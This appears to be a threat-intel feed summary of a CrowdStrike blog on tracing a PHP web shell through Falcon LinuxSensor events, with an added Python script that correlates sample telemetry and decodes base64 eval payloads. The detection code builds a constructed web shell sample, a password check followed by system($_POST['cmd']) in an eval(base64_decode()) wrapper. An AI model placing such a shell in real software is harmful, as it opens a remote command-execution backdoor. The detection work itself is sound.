Advanced Web Shell Detection and Prevention: A Deep Dive into CrowdStrike's Linux Sensor Capabilities
ID: 3895f9d4-1596-50c5-9361-d38c7f5be7b9
STIX ID: report--3895f9d4-1596-50c5-9361-d38c7f5be7b9
Feed Name: Crowdstrike Blog
This excerpt demonstrates using Falcon LogScale queries to investigate a PHP web shell. It walks through four event types in sequence: a NewScriptWritten event for /var/www/html/uploads/cache.php written by an apache2 process (a web server process dropping a PHP file into its own upload directory, which is the first indicator worth pivoting on), a ScriptControlDetectInfo event containing the obfuscated eval payload, a PhpExecuteScript event confirming that the file was actually executed, and a PhpEvalString event providing the decoded eval content that reveals the web shell's logic and its authentication checks. Together these give analysts immediate visibility into the malicious script and its execution context, from initial write to the code it ultimately ran.
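The correlation the excerpt describes (a web server process writing a PHP file under the web root, then the same file being executed and its eval payload decoded) can be reproduced offline against sample telemetry. The block below is an added example written for this page, not CrowdStrike's code and not a LogScale query; the events are constructed, and field names such as `event_simpleName`, `TargetFileName`, `ImageFileName`, `ScriptContent` and `EvalString` are assumptions chosen for the example, as are the web-root and web-server-process allowlists.

```python
import base64
import os
import re
from typing import Dict, List, Optional

# Assumed paths and process names; tune to the environment being monitored.
WEB_ROOTS = ("/var/www/", "/srv/www/", "/usr/share/nginx/html/")
WEB_SERVER_IMAGES = ("apache2", "httpd", "php-fpm", "nginx")

# Constructed web shell body: a password check followed by command execution.
_SHELL_SRC = "if ($_POST['pwd'] !== 's3cret') { die(); } system($_POST['cmd']);"
_B64_SHELL = base64.b64encode(_SHELL_SRC.encode()).decode()

# Constructed sample events (not real Falcon telemetry); field names are assumptions.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"event_simpleName": "NewScriptWritten", "aid": "host1",
     "TargetFileName": "/var/www/html/uploads/cache.php",
     "ImageFileName": "/usr/sbin/apache2"},
    {"event_simpleName": "ScriptControlDetectInfo", "aid": "host1",
     "TargetFileName": "/var/www/html/uploads/cache.php",
     "ScriptContent": f"<?php eval(base64_decode('{_B64_SHELL}')); ?>"},
    {"event_simpleName": "PhpExecuteScript", "aid": "host1",
     "TargetFileName": "/var/www/html/uploads/cache.php",
     "ImageFileName": "/usr/sbin/apache2"},
    {"event_simpleName": "PhpEvalString", "aid": "host1",
     "TargetFileName": "/var/www/html/uploads/cache.php",
     "EvalString": _SHELL_SRC},
    # Benign noise: a deployment tool writing a legitimate PHP file.
    {"event_simpleName": "NewScriptWritten", "aid": "host1",
     "TargetFileName": "/var/www/html/index.php",
     "ImageFileName": "/usr/bin/rsync"},
]


def is_suspicious_write(ev: Dict[str, str]) -> bool:
    """A web server process writing a .php file under the web root."""
    if ev.get("event_simpleName") != "NewScriptWritten":
        return False
    path = ev.get("TargetFileName", "")
    writer = os.path.basename(ev.get("ImageFileName", ""))
    return path.endswith(".php") and path.startswith(WEB_ROOTS) and writer in WEB_SERVER_IMAGES


def decode_eval_payload(script: str) -> Optional[str]:
    """Decode eval(base64_decode('...')) if present; None when absent or invalid."""
    m = re.search(r"base64_decode\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", script)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
    except (ValueError, UnicodeDecodeError):
        return None


def correlate(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Join write, detection, execution and eval events by (host, file path)."""
    findings: Dict[tuple, Dict[str, object]] = {}
    for ev in events:
        if is_suspicious_write(ev):
            key = (ev.get("aid"), ev["TargetFileName"])
            findings[key] = {
                "aid": ev.get("aid"),
                "path": ev["TargetFileName"],
                "writer": os.path.basename(ev.get("ImageFileName", "")),
                "executed": False,
                "decoded_payload": None,
                "eval_string": None,
            }
    for ev in events:
        key = (ev.get("aid"), ev.get("TargetFileName"))
        if key not in findings:
            continue
        f = findings[key]
        name = ev.get("event_simpleName")
        if name == "ScriptControlDetectInfo":
            f["decoded_payload"] = decode_eval_payload(ev.get("ScriptContent", ""))
        elif name == "PhpExecuteScript":
            f["executed"] = True
        elif name == "PhpEvalString":
            f["eval_string"] = ev.get("EvalString")
    return list(findings.values())


if __name__ == "__main__":
    for finding in correlate(SAMPLE_EVENTS):
        print(finding)
```

The write event alone is only a lead; the finding becomes actionable once `executed` is set by PhpExecuteScript and the decoded payload matches what PhpEvalString reports the interpreter actually ran. The benign rsync write is dropped because the writer is not a web server process, which is the same filter an analyst would apply in the LogScale query.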
